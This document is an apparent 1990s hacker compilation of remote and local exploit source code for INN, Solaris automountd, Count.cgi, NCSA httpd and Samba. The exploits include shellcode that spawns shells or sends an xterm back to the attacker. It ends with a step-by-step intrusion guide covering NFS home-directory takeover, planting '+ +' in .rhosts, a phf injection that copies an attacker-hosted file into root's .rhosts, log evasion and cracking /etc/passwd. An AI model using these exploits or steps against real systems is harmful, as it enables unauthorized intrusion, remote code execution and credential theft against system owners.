 * To compile: cc nnrp.c -o nnrp. Usage: nnrp <host> <file generated by innbuf>
.
 * (C) 1997 by Method of Dweebs <method@arena.cwnet.com>
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <limits.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>

#define POST            "POST\n"

#define SAY(a, b)       write(a, b, strlen(b))
#define CHOMP(a, b)     read(a, b, sizeof(b))
#define basename(a)     bname(a)

char *me;

make_addr(char *name, struct in_addr *addr)
{
        struct hostent *hp;

        if(inet_aton(name, addr) == 0) {
                if(!(hp = gethostbyname(name))) {
                        fprintf(stderr, "%s: ", me);
                        herror(name);
                        exit(1);
                }
                addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
        }
}

char *bname(char *str)
{
        char *cp;

        if((cp = (char *)strrchr(str, '/')) != NULL)
                return(++cp);
        else
                return(str);
}

void my_err(char *errstr, int err)
{
        fprintf(stderr, "%s: ", me);
        perror(errstr);
        exit(err);
}

void usage()
{
        printf(
                "INN version 1.[45].x exploit by Method <method@arena.cwnet.com
>\n"
                "Usage: %s <host> <filename>\n"
                "Will start a shell on the remote host.\n"
                "The second argument is the file containing the overflow data.\
n",
                me);
        exit(1);
}

select_loop(int netfd)
{
        int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
        char buf[512];
        fd_set rfds;

        for( ; ; ) {
                FD_ZERO(&rfds);
                FD_SET(in, &rfds);
                FD_SET(netfd, &rfds);

                if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0)
                        my_err("select", 1);

                if(!ret)
                        continue;

                if(FD_ISSET(in, &rfds)) {
                        if((n = read(in, buf, sizeof(buf))) > 0)
                                write(netfd, buf, n);
                }

                if(FD_ISSET(netfd, &rfds)) {
                        if((n = read(netfd, buf, sizeof(buf))) > 0)
                                write(out, buf, n);
                        else
                                break;
                }
        }
}

int news_sock(char *host)
{
        struct sockaddr_in sin;
        int sock;

        sin.sin_port = htons(119);
        sin.sin_family = AF_INET;
        make_addr(host, &(sin.sin_addr));

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                my_err("socket", 1);

        if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
                my_err("connect", 1);

        return(sock);
}

void send_egg(int sk, char *file)
{
        char buf[BUFSIZ];
        int dfd;
        int n;

        if((dfd = open(file, O_RDONLY)) < 0)
                my_err("open", 1);

        printf("Executing innd exploit.. be patient.\n");

        n = CHOMP(sk, buf);
        buf[n] = '\0';
        printf(buf);
        SAY(sk, POST);
        n = CHOMP(sk, buf);
        buf[n] = '\0';
        printf(buf);
        sleep(2);
        printf("Sending overflow data.\n");
        while((n = CHOMP(dfd, buf)) > 0)
                write(sk, buf, n);
        sleep(2);
}

void main(int argc, char **argv)
{
        char *victim, *filename;
        int s;

        me = basename(argv[0]);

        if(argc != 3)
                usage();

        filename = argv[2];

        send_egg(s = news_sock(victim = argv[1]), filename);

        select_loop(s);
        fprintf(stderr, "Connection closed.\n");
        printf("Remember: Security is futile. Dweebs WILL own you.\n");
        exit(0);
}

---------------------------------------------------------------------------


hehehehhahaha... kewl, huh ?
And there is automountd, for SunOs 5.5.1... :)

/*
 this is really dumb automountd exploit, tested on solaris 2.5.1
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
 map is executed via popen with key given as argument, read automount(1M)

 patch 10465[45] fixes this

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
  printf("Usage: %s mountpoint map key [opts]\n", s);
  exit(0);
}

bool_t
xdr_mntrequest(xdrs, objp)
        register XDR *xdrs;
        mntrequest *objp;
{

        register long *buf;

        if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
                return (FALSE);
        return (TRUE);
}

bool_t
xdr_mntres(xdrs, objp)
        register XDR *xdrs;
        mntres *objp;
{

        register long *buf;

        if (!xdr_int(xdrs, &objp->status))
                return (FALSE);
        return (TRUE);
}

main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  if (argc < 4)
    usage(argv[0]);

  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  req.opts=argv[4];
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  clnt_destroy(cl);
}

Now, this here is very very dangerous, it exploits the Count.Cgi, on the web
servers.. :)


/*

Count.cgi (wwwcount) linux  test exploit
(c) 05/1997 by plaguez  -  dube0866@eurobretagne.fr
Contact me if you manage to improve this crap.

This program needs drastic changes to be useable.
If you can't understand how to modify it for your own purpose,
please do not consider trying it.

*/

#include <stdio.h>
#include <stdlib.h>

char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
"\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56"
"\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d"
"\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0"
"127.000.000.001:00"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff";

/*

Assembly stuff for the previous buffer.
This basically implements an execve syscall, by creating
an array of char* (needs to put a null byte at the end of
all strings).
Here we gonna exec an xterm and send it to our host.
(you can't simply exec a shell due to the cgi proto).

        jmp    60
        popl   %esi
        xorl   %eax,%eax           # efface eax
        movl   %esi,%ecx           # recupere l'adresse du buffer
        leal   0x18(%esi),%ebx     # recupere l'adresse des chaines
        movb   %al,0x2c(%esi)      # cree les chaines azt
        movb   %al,0x30(%esi)      #
        movb   %al,0x39(%esi)
        movb   %al,0x4b(%esi)
        leal   0x20(%esi),%edx     # cree le char**
        movl   %edx,(%esi)
        leal   0x2d(%esi),%edx
        movl   %edx,0x4(%esi)
        leal   0x31(%esi),%edx
        movl   %edx,0x8(%esi)
        leal   0x3a(%esi),%edx
        movl   %edx,0xc(%esi)
        leal   0x10(%esi),%edx
        movl   %eax,0x10(%esi)
        movb   $0xb,%al
        int    $0x80                #  passe en mode kernel
        xorl   %ebx,%ebx            #  termine proprement (exit())
        movl   %ebx,%eax            #  si jamais le execve() foire.
        inc    %eax                 #
        int    $0x80                #
        call   -65                  #  retourne au popl en empilant l'adresse d
e la chaine
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .ascii \"/usr/X11R6/bin/xterm0\"         # 44
        .ascii \"-ut0\"                          # 48
        .ascii \"-display0\"                 # 57  au ;
        .ascii \"127.000.000.001:00\"        # 75 (total des chaines)
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
            ...
 */

char qs[7000];
char chaine[]="user=a";

unsigned long getesp() {
   //   asm("movl %esp,%eax");
   return 0xbfffee38;
}

void main(int argc, char **argv) {
   int compt;
   long stack;

   stack=getesp();

   if(argc>1)
     stack+=atoi(argv[1]);

   for(compt=0;compt<4104;compt+=4) {
      qs[compt+0] = stack &  0x000000ff;
      qs[compt+1] = (stack & 0x0000ff00) >> 8;
      qs[compt+2] = (stack & 0x00ff0000) >> 16;
      qs[compt+3] = (stack & 0xff000000) >> 24;
   }

   strcpy(qs,chaine);
   qs[strlen(chaine)]=0x90;

   qs[4104]= stack&0x000000ff;
   qs[4105]=(stack&0x0000ff00)>>8;
   qs[4106]=(stack&0x00ff0000)>>16;
   qs[4107]=(stack&0xff000000)>>24;
   qs[4108]= stack&0x000000ff;
   qs[4109]=(stack&0x0000ff00)>>8;
   qs[4110]=(stack&0x00ff0000)>>16;
   qs[4111]=(stack&0xff000000)>>24;
   qs[4112]= stack&0x000000ff;
   qs[4113]=(stack&0x0000ff00)>>8;
   qs[4114]=(stack&0x00ff0000)>>16;
   qs[4115]=(stack&0xff000000)>>24;
   qs[4116]= stack&0x000000ff;
   qs[4117]=(stack&0x0000ff00)>>8;
   qs[4118]=(stack&0x00ff0000)>>16;
   qs[4119]=(stack&0xff000000)>>24;
   qs[4120]= stack&0x000000ff;
   qs[4121]=(stack&0x0000ff00)>>8;
   qs[4122]=(stack&0x00ff0000)>>16;
   qs[4123]=(stack&0xff000000)>>24;
   qs[4124]= stack&0x000000ff;
   qs[4125]=(stack&0x0000ff00)>>8;
   qs[4126]=(stack&0x00ff0000)>>16;
   qs[4127]=(stack&0xff000000)>>24;
   qs[4128]= stack&0x000000ff;
   qs[4129]=(stack&0x0000ff00)>>8;
   qs[4130]=(stack&0x00ff0000)>>16;
   qs[4131]=(stack&0xff000000)>>24;

   strcpy((char*)&qs[4132],shell);

   /* Choose what to do here */
   printf("GET /cgi-bin/Count.cgi?%s\n\n",qs);
   /*fprintf(stderr,"\n\nadresse: %x0x\n",stack);
   printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %x\n\n",qs,stack);
   setenv("QUERY_STRING",qs,1);
   system("/usr/local/etc/httpd/cgi-bin/Count.cgi");
   system("/bin/sh");*/

}



And of course, The HTTPD Exploit ... :)

/*
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of
ToXyn !!!
 *
 * usage:
 *      $ (hackttpd 0; cat) | nc victim 143
 *                  |
 *                  +--> usually from -1000 to 1000 (try steeps of 100)
 */

#include <stdio.h>

unsigned char shell[] = {
'/',0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b
,
0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
'b','i','n','/','s','h'
};

char username[256+8];

void main(int argc, char *argv[]) {
        int i,a;
        long val;

        if(argc>1)
                a=atoi(argv[1]);
        else
                a=0;

        strcpy(username,shell);

        for(i=strlen(shell);i<sizeof(username);i++)
                username[i]=0x90; /* NOP */

        val = 0xbfff537c + 4 + a;

        i=sizeof(username)-4;
        {
                username[i+0] = val & 0x000000ff;
                username[i+1] = (val & 0x0000ff00) >> 8;
                username[i+2] = (val & 0x00ff0000) >> 16;
                username[i+3] = (val & 0xff000000) >> 24;
        }

        username[ sizeof(username) ] = 0;

        printf("GET %s\n/bin/bash -i 2>&1;\n", username);
}


And, last but not least, the samba ExpLoit.. :)

/*
                      ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
                   |  ---  |  |       /   |  |   |  |
                   '''   '''   '''''''    ''''   ''''

                    CreW Presente For Y0uR plEaSure

                    Samba remote & LocaL buffer overflow!

 found & exploited by some "blaireaux" and "mr3615phf" :)))))))))))  <joke>

recursive greetz: ADM !

a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the rest
of t0xyn , and my friend [oO giemor Oo] <yes i have a sploit :)
,kod,theblade,reformed,m0sfet,kewl,oldmaster,owl,th0s

gigaacidbrutalhardcorebigextra greetz to da Beautiful: Heike <i'am in heIk3c0re
>.

big up to: da movement <stay cool ! >.

codeurz greetz going to: aleph1 <the guru its ALL !> & to samba team
<i love samba :) really !>

anal greetz: #banane suxxxxxxxxxxx  Hotlame & Co <kill diz lamer>
------------------------------------------------------------------------------
explain of the bug: is really simple if your send a large passwd bha
your make a buffer overflow hahhahaha =) iam not good for explain go fuck !=))
                                --**JOKE**--

------------------------------------------------------------------------------
patch ?? WHAT U WANNA A PATCH ??? :))))
------------------------------------------------------------------------------

[SO..] we search the shellcode of other system (SUNos , solaris, etc)
and specialy SCO !

------------------------------------------------------------------------------
usage: first you must have a special smbclient for send a large large passwd
how ?? tell me for the bin of get the source of samba and change in smb.h
at line 248:
typedef char pstring[1024];
to
typedef char pstring[20000];
and now compile smbclient !

# make smbclient

[dont forget to edit the makefile !!]
see the line 199 in makefile

-------------------------------------------------------------------------------
mail 4 question, comments etc etc bla bla : admsmb@hotmail.com

-------------------------------------------------------------------------------

*/

/* Note i have include a little utility pinched from ADMtoolz
 for get the netbios name

  --------------------------------------------------------------------------
------------------------------[ADMnmbname.c]----------------------------------
  --------------------------------------------------------------------------  *
/

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#define NMBHDRSIZE 13
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>

struct nmbhdr {
unsigned short int id;

unsigned char  R:1;
unsigned char  opcode:4;
unsigned char  AA:1;
unsigned char  TC:1;
unsigned char  RD:1;
unsigned char  RA:1;
unsigned char  unless:2;
unsigned char  B:1;
unsigned char  RCODE:4;

unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
unsigned char namelen;
};

struct typez{
u_int type;
u_int type2;
};

unsigned int host2ip(char *serv)
{
struct sockaddr_in sin;
struct hostent *hent;

hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sin, sizeof(sin));
bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
return sin.sin_addr.s_addr;
}

main( int argc, char  **argv)
{
struct sockaddr_in  sin_me , sin_dst;
struct nmbhdr *nmb,*nmb2;
struct iphdr *ipz;
struct typez  *typz;
struct hostent *hent;
int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0;
int longueur=sizeof(struct sockaddr_in);
char  *data;
char  *dataz;
char   buffer[1024];
char   buffer2[1024];
char   namezz[1024];
char   name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
char   c;

if(argc <2) {
        printf("usage: ADMnmbname <ip of the victim>\n");
        exit (0);
        }

socket_client=socket(AF_INET,SOCK_DGRAM,17);
sr=socket(AF_INET,SOCK_RAW,17);
ioctl(sr,FIONBIO,&i);

sin_me.sin_family=AF_INET;
sin_me.sin_addr.s_addr=htonl(INADDR_ANY);
sin_me.sin_port=htons(2600);

sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(137);
sin_dst.sin_addr.s_addr = host2ip(argv[1]);

nmb = (struct nmbhdr *)  buffer;
data = (char *)(buffer+NMBHDRSIZE);
typz = (struct typez *)(buffer+NMBHDRSIZE+33);
nmb2 = (struct nmbhdr *)(buffer2+20+8);
ipz   = (struct iphdr *)buffer2;
dataz = (char *)(buffer2+50+7+20+8);

memset(buffer,0,1024);
memset(buffer2,0,1024);
memset(namezz,0,1024);
memcpy(data,name,33);

           /* play with the netbios query format :) */

nmb->id=0x003;
nmb->R=0;                  /* 0 for question 1 for response */
nmb->opcode=0;             /* 0 = query */
nmb->que_num=htons(1);     /* i have only 1 question :) */
nmb->namelen=0x20;
typz->type=0x2100;
typz->type2=0x1000;

sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur);

  for(timeout=0;timeout<90;timeout++ )
  {
           usleep(100000);
           buffer2[0]='0';
           recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur
);

        if(buffer2[0]!='0')
                {

                          if(nmb2->rep_num!=0)
                            {
                            bha=0;

                                     for(;;)
                                     {

                                        c=*(dataz+bha);
                                        if(c!='\x20')
                                                        {

                                                        namezz[bha]=c;
                                                        bha++;
                                                         }
                                        if(c=='\x20')break;
                                   }

                                printf("netbios name of %s is %s\n",argv[1],nam
ezz);
                                try =4;
                                GO = 4;

                                break;
                              }
                }

     }

memset(buffer,0,1024);
memset(buffer2,0,1024);

}

/*
 ---------------------------------------------------------------------------
----------------------------[ADMkillsamba.c]---------------------------------
 ---------------------------------------------------------------------------

         generic buffer overflow ameliored for samba sploit
 the sploit send a xterm to your machine .
 hey dont forget to do a  xhost +IP-OF-VICTIM  !!!!
 and put the the sploit to the same directory of  the special smbclient !

 */

/* diz default offset and buffer size Work fine on a my system Redhat 4.2  with
 samba server

1.9.17alpha5 < the last version !> i have tested on other system with this deff
autl buff & size

smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2  but somtime you need to ch
ange the

buffer size and offset   try a buffer of ( 1050<buffer >1100) and a offset ( 15
00<off >2500)

mail me at admsmb@hotmail.com if u wanna some help */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdlib.h>
#include <strings.h>

unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  char netbios_name[100];

  char bufferz[255];
  char ipz[40];
  char myipz[40];
  unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
  int *ret;
  unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff";
  unsigned char arg1[50];
  char arg2[50]="bhahah\xff";

  int i,pid;

  bzero(netbios_name,100);
  bzero(bufferz,255);
  bzero(ipz,40);
  bzero(ipz,40);

  if(argc <4){
  printf(" usage: ADMkillsamba <ip of the victim> <netbios name> <your ip> [buf
f size] [offset size]\n");
  printf("<ip of victim> = 11.11.11.11  ! THe numerical IP  Only ! not www.xxx.
cc !\n");
  printf("<netbios name> = VICTIME    for get the netbios name use ADMnmbname o
r ADMhack\n");
  printf("<your ip> = the sploit send a xterm to your machine heh \n");
  printf("option:\n");
  printf("[buff size] = the size of the buffer to send default is 3081 try +1 -
1 to a plage of +10 -10\n");
  printf("[offset size] = the size of the offset default is 3500 try +50 -50 to
 a plage of 1000 -1000\n");
  printf(" HaVe Fun\n");
  exit(0);
  }

    sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]);

    shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
    bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);

 printf("4 byte = 0x%x\n",shellcode[4]);
 printf("5 byte = 0x%x\n",bla[2]);

  strcat(shellcode,cmd);
  strcat(shellcode,arg1);
  strcat(shellcode,bla);
  strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxx");

//  printf("%s\n",shellcode);

  strcpy(ipz,argv[1]);                   /* haha u can overflow my sploit :) */
  strcpy(netbios_name,argv[2]);

  if (argc > 4) bsize  = atoi(argv[4]);
  if (argc > 5) offset = atoi(argv[5]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);

  addr =  0xbffffff0 - offset ;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/4; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/4) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);

 }

------------------------------------------[END]--------------------------------
-----------------

Now, dont you wish you had samba ?????????? :)
Well, this about covers most of it, but it covers only the exploit part...
For the rest, i use my very very old guide, to explain the nfs problems &&
phf.. bcoz i got tired of writting... sooooooooooooo ... here it is.. :)
<snif>
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr  victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~#id
uid=0 euid=0
mysite:~#whoami
root
mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh because bash usually leaves a (Damn!) .bash_history  and you 
might forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers *snifsnif*
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
Well, now be very carefull with the web exploits, because they usually get
logged. (not usually, always.. :))
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger...
that should work on some systems.. :)
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

or instead of rcp-ing, try catt-ing the /etc/passwd file, and then cracking
it, to get passwords...

And so on......